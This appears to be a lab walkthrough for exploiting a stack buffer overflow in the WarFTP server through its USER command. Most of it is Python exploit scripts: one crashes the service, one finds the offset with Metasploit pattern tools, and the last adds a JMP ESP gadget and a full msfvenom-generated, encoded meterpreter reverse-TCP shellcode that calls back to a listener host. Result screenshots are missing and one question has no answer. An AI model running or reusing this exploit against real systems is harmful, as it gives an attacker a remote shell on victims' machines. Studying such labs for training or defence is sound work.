Material
Steps
Send buffer to trigger segmentation fault:
#!/usr/bin/python
import socket
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
buffer = "\x41" * 1000
s.connect(('192.168.119.155',21))
data = s.recv(1024)
print ("Sending data to WarFTP...")
s.send('USER '+buffer+'\r\n')
data = s.recv(1024)
s.send(' PASS PASSWORD '+'\r\n')
s.close()
print ("Finish")
The result from victim:
Send buffer to find exact offset:
# /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2700 > /tmp/pattern
#!/usr/bin/python
import socket
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
buffer = open('/tmp/pattern','r').read()
s.connect(('192.168.119.155',21))
data = s.recv(1024)
print ("Sending data to WarFTP...")
s.send('USER '+buffer+'\r\n')
data = s.recv(1024)
s.send(' PASS PASSWORD '+'\r\n')
s.close()
print ("Finish")
The result from victim:
The right offset:
# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 1000 -q 32714131
Find gadget e.g. jmp esp at SHELL32.dll:
The gadget located at \xd7\x30\x9e\x7c.
Generate shellcode and avoid bad chars:
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.119.158 LPORT=443 -f py -e x86/shikata_ga_nai -b "\x00\x0a\x0d\x40\xcc" > shellcode
#!/usr/bin/python
import socket
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
buf = ""
buf += "\xbb\xd1\x9d\x2c\x04\xdb\xd1\xd9\x74\x24\xf4\x58\x33"
buf += "\xc9\xb1\x54\x31\x58\x13\x83\xc0\x04\x03\x58\xde\x7f"
buf += "\xd9\xf8\x08\xfd\x22\x01\xc8\x62\xaa\xe4\xf9\xa2\xc8"
buf += "\x6d\xa9\x12\x9a\x20\x45\xd8\xce\xd0\xde\xac\xc6\xd7"
buf += "\x57\x1a\x31\xd9\x68\x37\x01\x78\xea\x4a\x56\x5a\xd3"
buf += "\x84\xab\x9b\x14\xf8\x46\xc9\xcd\x76\xf4\xfe\x7a\xc2"
buf += "\xc5\x75\x30\xc2\x4d\x69\x80\xe5\x7c\x3c\x9b\xbf\x5e"
buf += "\xbe\x48\xb4\xd6\xd8\x8d\xf1\xa1\x53\x65\x8d\x33\xb2"
buf += "\xb4\x6e\x9f\xfb\x79\x9d\xe1\x3c\xbd\x7e\x94\x34\xbe"
buf += "\x03\xaf\x82\xbd\xdf\x3a\x11\x65\xab\x9d\xfd\x94\x78"
buf += "\x7b\x75\x9a\x35\x0f\xd1\xbe\xc8\xdc\x69\xba\x41\xe3"
buf += "\xbd\x4b\x11\xc0\x19\x10\xc1\x69\x3b\xfc\xa4\x96\x5b"
buf += "\x5f\x18\x33\x17\x4d\x4d\x4e\x7a\x19\xa2\x63\x85\xd9"
buf += "\xac\xf4\xf6\xeb\x73\xaf\x90\x47\xfb\x69\x66\xa8\xd6"
buf += "\xce\xf8\x57\xd9\x2e\xd0\x93\x8d\x7e\x4a\x32\xae\x14"
buf += "\x8a\xbb\x7b\x80\x80\x2b\x44\xfd\xe2\x35\x2c\xfc\x0c"
buf += "\x48\x16\x89\xeb\x1a\x38\xda\xa3\xda\xe8\x9a\x13\xb2"
buf += "\xe2\x14\x4b\xa2\x0c\xff\xe4\x48\xe3\x56\x5c\xe4\x9a"
buf += "\xf2\x16\x95\x63\x29\x53\x95\xe8\xd8\xa3\x5b\x19\xa8"
buf += "\xb7\x8b\x78\x52\x48\x4b\x11\x52\x22\x4f\xb3\x05\xda"
buf += "\x4d\xe2\x62\x45\xae\xc1\xf0\x82\x50\x94\xc0\xf9\x66"
buf += "\x02\x6d\x96\x86\xc2\x6d\x66\xd0\x88\x6d\x0e\x84\xe8"
buf += "\x3d\x2b\xcb\x24\x52\xe0\x59\xc7\x03\x54\xca\xaf\xa9"
buf += "\x83\x3c\x70\x51\xe6\x3f\x77\xad\x74\x1d\xd0\xc6\x86"
buf += "\x21\xe0\x16\xed\xa1\xb0\x7e\xfa\x8e\x3f\x4f\x03\x05"
buf += "\x68\xc7\x8e\xcb\xda\x76\x8e\xc6\xbb\x26\x8f\xe4\x67"
buf += "\x3e\x1e\x0b\x98\x3f\xe0\x30\x4e\x06\x96\x71\x52\x3d"
buf += "\xa9\xc8\xf7\x14\x20\x32\xab\x67\x61"
buffer = 'A'*485
buffer += '\xd7\x30\x9e\x7c'
buffer += '\x90'*12
buffer += buf
s.connect(('192.168.119.155',21))
data = s.recv(1024)
print ("Sending data to WarFTP...")
s.send('USER '+buffer+'\r\n')
data = s.recv(1024)
s.send(' PASS PASSWORD '+'\r\n')
s.close()
print ("Finish")
P: How to get exact amount of NOP register?
S:
The shell spawned: